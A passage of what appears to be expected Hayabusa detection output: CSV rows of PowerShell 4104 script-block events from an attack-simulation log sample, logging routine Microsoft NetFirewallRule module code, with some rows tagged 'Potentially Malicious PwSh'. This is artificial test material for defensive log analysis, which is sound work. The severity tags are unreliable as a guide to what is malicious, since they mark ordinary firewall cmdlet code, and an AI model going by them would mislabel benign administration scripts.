'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] 